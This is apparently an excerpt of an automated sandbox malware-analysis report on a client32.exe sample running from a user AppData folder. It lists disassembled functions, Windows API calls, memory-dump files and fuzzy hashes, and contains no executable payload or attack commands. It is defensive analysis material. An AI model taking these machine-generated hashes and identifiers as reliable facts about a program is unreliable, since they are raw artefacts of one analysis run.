Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CurrentFileModuleNameProcess
String ID: C:\Users\user\AppData\Local\DNScache\client32.exe
API String ID: 2251294070-3995528064
Opcode ID: 175f4557dc482a57eb76b78249b39d771ec997a79dcb17f3cb98c18ab83c412e
Instruction ID: 3861a2256d97ab3587e169a88173a1ad5162c73b82a2be34c78142318e04e013
Opcode Fuzzy Hash: 175f4557dc482a57eb76b78249b39d771ec997a79dcb17f3cb98c18ab83c412e
Instruction Fuzzy Hash: 551104703012129FE702CFA9CA80B6AF7D4BB40B5DF20443CE51CC7284DB72E4808B66

Function 6C3D7AE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6C3D7B44

Strings

hbuf->data, xrefs: 6C3D7B2C
httputil.c, xrefs: 6C3D7B27

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: hbuf->data$httputil.c
API String ID: 4104443479-2732665889
Opcode ID: fa8c672e08f228f293d786c3cd4be211052141c5f763a3ebf9adb13196074b17
Instruction ID: eaa3d57a9779c19d420ce2bd593f6d7401395c09e56f168550f1493d42df8fcf
Opcode Fuzzy Hash: fa8c672e08f228f293d786c3cd4be211052141c5f763a3ebf9adb13196074b17
Instruction Fuzzy Hash: 5E01D676A003015FC720DE58DC80D96B7A9EB89368B04C92AF989D7B09DA71F8448F91

Function 110CE2D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

__strdup.LIBCMT ref: 110CE2EA

Strings

..\CTL32\NSMString.cpp, xrefs: 110CE32A
*this==pszSrc, xrefs: 110CE32F

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __strdup
String ID: *this==pszSrc$..\CTL32\NSMString.cpp
API String ID: 838363481-1175285396
Opcode ID: fe394b4b7f598ffdd5f2dff962ba98becfda34ccc9ca43f8d2eecab3f36f48ff
Instruction ID: eeccc3474358d3e74e2719df0037009bed9e39e7ed5e23eed1fa245b6a95648c
Opcode Fuzzy Hash: fe394b4b7f598ffdd5f2dff962ba98becfda34ccc9ca43f8d2eecab3f36f48ff
Instruction Fuzzy Hash: 4BF02875E003121BC301CE5AAC04B9FFFED8F91A68B04C4BAE888D7211E630F805CAD0

Function 1110C530 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1110C539

Part of subcall function 1115F231: __FF_MSGBANNER.LIBCMT ref: 1115F24A
Part of subcall function 1115F231: __NMSG_WRITE.LIBCMT ref: 1115F251
Part of subcall function 1115F231: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F276

_memset.LIBCMT ref: 1110C562

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

..\ctl32\Refcount.cpp, xrefs: 1110C54C

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
String ID: ..\ctl32\Refcount.cpp
API String ID: 2803934178-2363596943
Opcode ID: 200ad2d98d6ddf261c64d4afe06da0272156d6e1d9b3f8a27b88e704f1a19228
Instruction ID: f168feb4c3d095bf71b41361d37947cfa605cfdaea55741e508b3d61f27a55cd
Opcode Fuzzy Hash: 200ad2d98d6ddf261c64d4afe06da0272156d6e1d9b3f8a27b88e704f1a19228
Instruction Fuzzy Hash: 4BE0C26BF4052933C251148A3C02FDBFB9C8BA29BCF050031FE08AB241E58AA60281E3

Function 110151E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102E966,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 110151F7
CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11015208

Strings

\\.\NSWFPDrv, xrefs: 110151F2

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle
String ID: \\.\NSWFPDrv
API String ID: 3498533004-85019792
Opcode ID: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
Instruction ID: 8afacd648940fbcf920c8f513ecddd5490900b3845592452e47c7361a4afad73
Opcode Fuzzy Hash: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
Instruction Fuzzy Hash: FFD0C971A420347AF231196AAC4CFCBAD0DDB427B5F210260FA3DE51C4C210489182F1

Function 111584F0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 11158513

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _calloc
String ID:
API String ID: 1679841372-0
Opcode ID: f3031245be8cca8daca63661d5ebf3f85c00e07d5324add31e8ecbca0796b44d
Instruction ID: 5025096fd8de2d151e38b3cbd3e49b7fa9e397ac28c8a5b9b8e36d9e3f64c26c
Opcode Fuzzy Hash: f3031245be8cca8daca63661d5ebf3f85c00e07d5324add31e8ecbca0796b44d
Instruction Fuzzy Hash: 7B51A175600216AFDB90CF59CC80FAAB7A5FF89744F108459FD29DB245DB31E901CBA1

Function 6C3C8FB0 Relevance: 4.6, APIs: 3, Instructions: 57networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C3C8FE4
getsockname.WSOCK32(?,?,00000010,?,02CE2C08,?), ref: 6C3C9005
WSAGetLastError.WSOCK32(?,?,00000010,?,02CE2C08,?), ref: 6C3C902E

Part of subcall function 6C3C5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6C3C8F91,00000000,00000000,6C40B8DA,?,00000080), ref: 6C3C5852

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast_memsetgetsocknameinet_ntoa
String ID:
API String ID: 3066294524-0
Opcode ID: fac34489591a30774f4955265fbc573cefdd12b3d040fc14368076d97ceb0d29
Instruction ID: 82481d34d335f2f098798707228b51e809940ef2da61071e0d5d54f4f173ed24
Opcode Fuzzy Hash: fac34489591a30774f4955265fbc573cefdd12b3d040fc14368076d97ceb0d29
Instruction Fuzzy Hash: DE111C72A00119ABCB00EFA9DD41AFEB7B8EB49214F04456AED05E7240E771AA148B92

Function 6C6109A9 Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6C611E32,00000001,?,00000000,00000000,00000000,?,6C6375BC,00000001,00000214), ref: 6C6109E8
_errno.MSVCR100(?,6C611E32,00000001,?,00000000,00000000,00000000,?,6C6375BC,00000001,00000214), ref: 6C63F3D7

Memory Dump Source

Source File: 00000004.00000002.4575938208.000000006C601000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000004.00000002.4575920772.000000006C600000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.4576103842.000000006C6B4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.4576121278.000000006C6B6000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.4576247728.000000006C6B9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c600000_client32.jbxd

Similarity

API ID: AllocateHeap_errno
String ID:
API String ID: 242259997-0
Opcode ID: c6cd5d9f1c62d6d5704424a67d99cbb9659c66268170a40b79e981de70e490db
Instruction ID: e9e377f558ee08a936bb965fdfe74f6cf12845cb4606ba1a534442e24e1d8dd2
Opcode Fuzzy Hash: c6cd5d9f1c62d6d5704424a67d99cbb9659c66268170a40b79e981de70e490db
Instruction Fuzzy Hash: 6A01D63134A2659BFF045E29C854BAB37589F42315F107569E8288BDD0DB70C860C79C

Function 1110E4E0 Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E50A
__wsplitpath.LIBCMT ref: 1110E525

Part of subcall function 11165724: __splitpath_helper.LIBCMT ref: 11165766

GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E559

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
String ID:
API String ID: 1847508633-0
Opcode ID: d0ae845c008ba612aed68590da51c112f65d12f644144d95634fe5507c5d2274
Instruction ID: d9ab0b369c0afb8d0b67032d2f04fd61fe2dce600b1b24ca6ae8626ff4d5541e
Opcode Fuzzy Hash: d0ae845c008ba612aed68590da51c112f65d12f644144d95634fe5507c5d2274
Instruction Fuzzy Hash: 9A11C435A4021DABDB14CB94CC42FEDF3B8AF48B04F508095E7246B1C0E7B03A08CB65

Function 1109DA90 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F5814,00000001,1113DB48,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DAB1
OpenProcessToken.ADVAPI32(00000000,?,?,110F5814,00000001,1113DB48,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DAB8

Part of subcall function 1109D9C0: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,7622F550,?,00000000), ref: 1109D9F8
Part of subcall function 1109D9C0: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DA14
Part of subcall function 1109D9C0: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0048FBF8,0048FBF8,0048FBF8,0048FBF8,0048FBF8,0048FBF8,0048FBF8,111E9B1C,?,00000001,00000001), ref: 1109DA40
Part of subcall function 1109D9C0: EqualSid.ADVAPI32(?,0048FBF8,?,00000001,00000001), ref: 1109DA53

CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DAD7

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
String ID:
API String ID: 2256153495-0
Opcode ID: 0a11e81a47c636721ab322bbb7c70e85b81e34e30720f5ccd422e263b73b106f
Instruction ID: 12af53fa4518c4cef8f6be965a5b7c49cdda7d2120c7f2b3a3d7e7081ea0e2d2
Opcode Fuzzy Hash: 0a11e81a47c636721ab322bbb7c70e85b81e34e30720f5ccd422e263b73b106f
Instruction Fuzzy Hash: 45F05870A01319EFCB05CFE5D88492EBBB8AF08208710847DE959C3204E631DA009F61

Function 1110C7D0 Relevance: 3.8, APIs: 3, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(111EB8B8,33E68B52,?,?,?,?,-00000001,1117DED8,000000FF,?,1110C8A8,00000001,?,11165D63,?), ref: 1110C804
EnterCriticalSection.KERNEL32(111EB8B8,33E68B52,?,?,?,?,-00000001,1117DED8,000000FF,?,1110C8A8,00000001,?,11165D63,?), ref: 1110C820
LeaveCriticalSection.KERNEL32(111EB8B8,?,?,?,?,-00000001,1117DED8,000000FF,?,1110C8A8,00000001,?,11165D63,?), ref: 1110C868

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterInitializeLeave
String ID:
API String ID: 3991485460-0
Opcode ID: 2f47e98770097156cb0d0458bb8c8cfa48597fdfb0496529848de5c0d5552423
Instruction ID: 50d3bf07ed62f8ac72a98081e9d6b0947c4259180a8386ba1c61d2c4731b2f26
Opcode Fuzzy Hash: 2f47e98770097156cb0d0458bb8c8cfa48597fdfb0496529848de5c0d5552423
Instruction Fuzzy Hash: 3011A775A017699FE7028F99C9C8F6EF7A8FB45624F40416AE911A3340D77459008BA8

Function 11068020 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000), ref: 110680E2

Strings

??CTL32.DLL, xrefs: 110680A3

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: ??CTL32.DLL
API String ID: 1029625771-2984404022
Opcode ID: 7971f279d7d3cfff8ecc60b53df71e93e16cc9cf1870f0795933491e91db9ea6
Instruction ID: c99c764ec1416419f4c197087b51ca8dd5e24f53ef7ae7073ac2675aa7219947
Opcode Fuzzy Hash: 7971f279d7d3cfff8ecc60b53df71e93e16cc9cf1870f0795933491e91db9ea6
Instruction Fuzzy Hash: 1631E4B1A04345DFEB10CF18CC40B9AB7E8FB45724F0086AAF9199B381E731AA41C792

Function 11026750 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetDriveTypeA.KERNEL32(?), ref: 1102677D

Strings

?:\, xrefs: 11026772

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
